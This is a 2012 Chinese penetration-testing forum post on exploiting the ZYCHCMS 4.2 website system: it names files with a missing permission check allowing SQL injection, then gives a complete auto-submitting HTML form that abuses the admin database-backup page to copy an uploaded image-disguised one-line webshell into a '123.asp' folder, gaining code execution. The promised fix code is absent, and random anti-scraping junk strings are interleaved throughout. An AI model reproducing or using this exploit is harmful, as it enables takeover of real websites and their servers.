中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
: B# d$ R! d5 [( H6 @# d
3 v9 d! |( M4 i/ H$ }
9 j# v; Z7 F0 A# e" n7 w9 {
: h' p% s" Q5 T- i, X2 x+ Z7 G$ H
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
- z. f- R# i. @( n
①SQL注射漏洞
- S" b x4 C2 B6 Z) e7 Y
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
8 [) t4 s7 g. S
漏洞原因:未过滤
- l J' o& X- N" }0 M* p1 H8 I
漏洞代码:
+ k! `8 @4 c" ~& }- S+ B
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
( a! `; i/ X5 [, x% F9 L
修复方法:在文件开头加入代码
& ~& V- }! H% O
' K8 A# ]' P" o* Z
s b+ O+ F% M' @# Q' M& L6 D; O
②后台拿WBSHELL
1 z$ u: [6 I5 S7 h# w
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 ~/ ^3 |* L8 T1 y! a- j
这里在网上找了一个,改了下,将就着用。
: k9 z0 s3 r s: U7 A
以下是代码本地提交代码
8 r& N. E( O; H2 }
/ ^9 u" A& N) p( n; I G2 V. E; n
3 d8 o. }4 W: S
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
* z# l, u7 K) A- d9 R
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
1 a. ]7 [3 L( o
<tr>
- R* {& h3 x& A: x& ?
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
2 j4 s' F5 J" ^; d
</tr>
# q+ o# U. e2 u1 p* O0 r
<tr>
& @& _1 B; k( B: B
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
* A3 n2 V1 p' Z: Y
</span>
/ w# U2 r% V* A& t2 Q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
9 s+ x! D: w6 I
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
* j3 g* S) \. h0 ]
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
" U& J' Z4 t# Q+ C% `
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
! [5 N. q6 h* w
<div align=”left”>
- j' Y [9 ?% _
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
0 F+ |: y( x/ b1 w5 ?
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
; ?1 G% x5 e5 ], t4 T' T) a
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
) ^( ]+ A4 H, t2 K [) z
</div></td>
% g$ m5 J$ k+ N0 x
</tr>
+ K+ z L/ s- q' S5 j
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
* E) I0 q5 @0 g' l4 A
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
# T& M: X; l" _# ?2 K: m- U
<td class=”td”><div align=”left”>
6 |# J- x5 L5 t% P4 d% r, _
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
$ @; N5 P5 A8 L+ M
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
) b& A/ U& u% w2 F# B9 I) |, G" Q/ l# O
</tr>
8 h( F' r1 K" H6 g6 K3 P
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
+ J/ ^* `5 x, E* V x! p
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
. u$ u2 ^0 b( z( ?- D6 b: s, P2 n% {' o
<td class=”td”><div align=”left”>
6 Q, ]+ t$ j; y/ D
<input type=”submit” value=”确定备份” class=”btn”
# {$ |- J6 N* \' `/ y4 |
</div></td>
5 `( Z& b0 u6 _ M8 K0 y
</tr>
9 y$ x: i1 o5 e0 H8 M( B/ q* O3 G/ G
</table></td></tr></form>
5 [* c' @. F1 a: q/ w4 y" a! D1 @
</table>
# o, U7 Q4 W8 I* Y) ?5 F6 [
</td>
9 V8 m& E5 y/ Q& E
</tr>
; L* r/ X7 ], ?# U/ y& d3 u( X
</table>
) x5 e, W6 A8 v7 [$ x" k; {" j
<script>
) Z" \" o. W+ |; H' \
document.all.add.submit();
4 }- U0 t$ _9 [9 I
</script>
% c/ e. x" r4 T9 @7 _7 Z$ D1 D" w
& D7 d7 J# w' h& B
8 g2 c0 x6 p! f4 j* k5 q
" q/ N# d& j! w7 B, J
, h8 z+ l0 t" w2 F$ ^. C
2 I7 E, M8 i" @; F
, @9 h) x( w0 _' w
6 Y: V2 `( Y' t! h! Z; m
a9 s' W7 V u: K" y
" q/ V: q i9 }
( l1 [. O H% ?3 u2 G& {* @
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2